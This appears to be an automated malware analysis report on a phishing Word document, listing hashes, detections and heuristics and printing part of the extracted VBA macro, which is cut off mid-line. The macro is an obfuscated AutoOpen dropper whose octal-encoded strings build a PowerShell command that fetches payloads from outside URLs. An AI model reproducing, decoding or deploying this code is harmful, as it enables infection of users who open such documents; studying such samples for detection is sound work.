Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7c344293212b1de4…

MALICIOUS

Office (OLE)

119.5 KB Created: 2018-02-05 18:26:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 13aaa5c6814602b7ed379812f63c86b0 SHA-1: adbcb557eb4d30e20e9856080dd8755e1404da7d SHA-256: 7c344293212b1de4798beb0cf70c9bec493460d5befba2eef1ce26a83c04ad2f
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro executes a function that uses Shell() to run code, likely to download and execute a second-stage payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further suggests a phishing lure designed to drop additional malware.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37627 bytes
SHA-256: 0bed5e901a473bd3beb75e0930f8ac037988cd3be02ff5e999311a15d588dfc3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KHIjzMczvksc"
Sub AutoOpen()
On Error Resume Next
cwwuLiOhR = vnBfMQGUVDnj + CDate(5483819) / 4358302 / 6123529 - 5418213 - Fix(104198)
VkACMFkLl = aRvtXIijc + CDate(8019705) / 6258401 / 1752303 - 219881 - Fix(1150920)
NLhiwTcOi = szQijiQUbBfD + CDate(4832008) / 2029621 / 3092369 - 4748184 - Fix(9523104)
qDmTMiupA = CPRnMiNAZr + CDate(9287637) / 9464213 / 8830932 - 4772413 - Fix(2383937)
Application.Run "GzWzuiovz", tfcwtDpYLtc
hzaKmXSXW = KwOfOVtiKOEJ + CDate(2837640) / 3817523 / 3910891 - 2249253 - Fix(1865268)
qhBtJNHij = iNAjrvBBmw + CDate(4097087) / 2047579 / 4141205 - 522551 - Fix(2784952)
jKHYkGqbN = qUsAiGAfBOU + CDate(1863262) / 5992653 / 2514629 - 2663417 - Fix(2607356)
ShMojLwia = AGwOomn + CDate(1496424) / 339164 / 5113768 - 1622678 - Fix(58371)
End Sub
Function tfcwtDpYLtc()
On Error Resume Next
jCCEC = ("Qdd6LnttU4VZjPwkG145P3zpmPv2D9u8K")
jEzPYcRj = zCbqVvUF + CDate(8515748) / 2722837 / 2150199 - 6457094 - Fix(554118)
HCLAV = clfqiLjCd + CDate(2300433) / 5872496 / 6076908 - 8041888 - Fix(2830291)
OLQZstml = Mid(jCCEC, 18, 3)
AFIqizs = ("dA6XQlz5B6 ,143 , 40,151, 156 ,40, 44, 101,104,103,130 6N")
VVCJiJ = QuRazzbwYPMpF + CDate(1186680) / 2425490 / 6889792 - 6332624 - Fix(2610644)
HAuMMkhuzNX = VRluOZCq + CDate(2521343) / 2696061 / 9366493 - 2681374 - Fix(8118415)
lkaPIIczDS = Mid(AFIqizs, 10, 46)
UtsaTWhJWi = ("wH472 , 57 ,57, 167 , 167 , 167 ,56 ,164,144 , 152 ,wHSYODpI8")
CARAka = hVbiADBwIOic + CDate(309342) / 4226864 / 92206 - 1661647 - Fix(1460819)
rWCGjo = sZOfOSTSI + CDate(9409232) / 6265448 / 5257494 - 1156853 - Fix(1852446)
adQPBITtvi = Mid(UtsaTWhJWi, 4, 49)
BCcrODSjd = ("ihQM6NLu4SNODDlVjjsVo8PCG3Hw8z45 , 156 , 164, 73 ,Xi")
pIGScSkU = aVCGJKiu + CDate(813305) / 3043618 / 6434562 - 1615196 - Fix(4844939)
OGSnVN = YNjmnRFTMMX + CDate(215656) / 5771934 / 8516215 - 4813356 - Fix(4098821)
GopVjzf = Mid(BCcrODSjd, 31, 20)
oKzmXB = ("nbkkhj450, 164 , 164 ,160,72,57, 57,61,60,60 ,145, 166 ,145 ,162IMKP8wHEOallV8l6Z12sD")
AdYvCdzACjS = rKCWvaUbGGIp + CDate(6719475) / 1515651 / 6254195 - 8028586 - Fix(4169531)
jfwnArBf = wNubJQHSZdBM + CDate(3523480) / 5081143 / 5208430 - 7665229 - Fix(1807855)
ZiIzI = Mid(oKzmXB, 8, 57)
tMkRcEbVYBN = ("GnEu6Dum [sTring]::jOIN( '', ( ( 44, 156 ,163 ,141 , 144 ,141 ,163 ,144,40,75, 40 , 46,50 ,47, 156, 47, 53 ,47 , 145,47, 53 , 47 ,167 ,55 ,157,142 TXYi")
vsGRHzCTO = pXoQBmPcA + CDate(8146910) / 4896317 / 8875404 - 7680922 - Fix(6588175)
IcRUEip = vwMzSIENI + CDate(6804528) / 8678553 / 3216182 - 8211632 - Fix(7586512)
ulKrWjkv = Mid(tMkRcEbVYBN, 9, 139)
SbTwSI = ("f,152 ,145,143 ,47, 53, 47, 164 ,47 , 51 ,40 ,162 , 141 ,156, 144 , 157,155, 73,44, 131,131 ,125 , 40 , 75 , 40 , 56, 509DmaIwWDdh6")
TZjsvYjzLz = cRBjGQaEJlJjhH + CDate(4094155) / 4716626 / 7950833 - 6222678 - Fix(8032509)
RFOmk = FozLvFuvfLMEvl + CDate(3269928) / 9928903 / 7933311 - 680570 - Fix(2698529)
aMSRM = Mid(SbTwSI, 2, 119)
GsROiZfE = ("BVU2SPPqw5o,47, 156 ,145 ,47 , 53,47 ,167, 47 , 53,47 ,55 ,157, 142 , 152, 145, 143 , 164 ,47,51, 40, 123, 171 , 163 ,164 ,145 , 155, 56 ,116, 145 , 164 ,56 , 127 ,145 , 142, 103 , 154 ,151 ,1pNHq6NGzS8V0r8Ow80ROsVwqSuC")
GvLdobSinv = oAWiZwYFkvqVj + CDate(7270269) / 3524155 / 1058350 - 9102496 - Fix(3969478)
WqhoIRiUw = wRcujMQDBkjtdj + CDate(9866427) / 2959233 / 2524634 - 2720567 - Fix(4475121)
SLzboX = Mid(GsROiZfE, 12, 181)
vPPJKoqIdDX = ("jifZS62 , 55 ,167,141,171, 56,162, 165 , 57 , 126, 124 ,61,130 ,105 , 102 , 62, 57 , 77 , 150 , 164, 164 , 160 ,72 , 57, 57 , 167 ,167 , 167 ,56, 164 , 150 , 145 ,154, 157 , 166 , 145 uCX87v3GRmXMtDiGDFBDA11M51")
pjDuIASJKbj = VYLGmSIuXUEBN + CDate(7990014) / 6916887 / 4311043 - 999528 - Fix(8337782)
dQaqX = JHYdtiPzkh + CDate(1663852) / 4381345 / 2296341 - 4181311 - Fix(7729440)
B
... (truncated)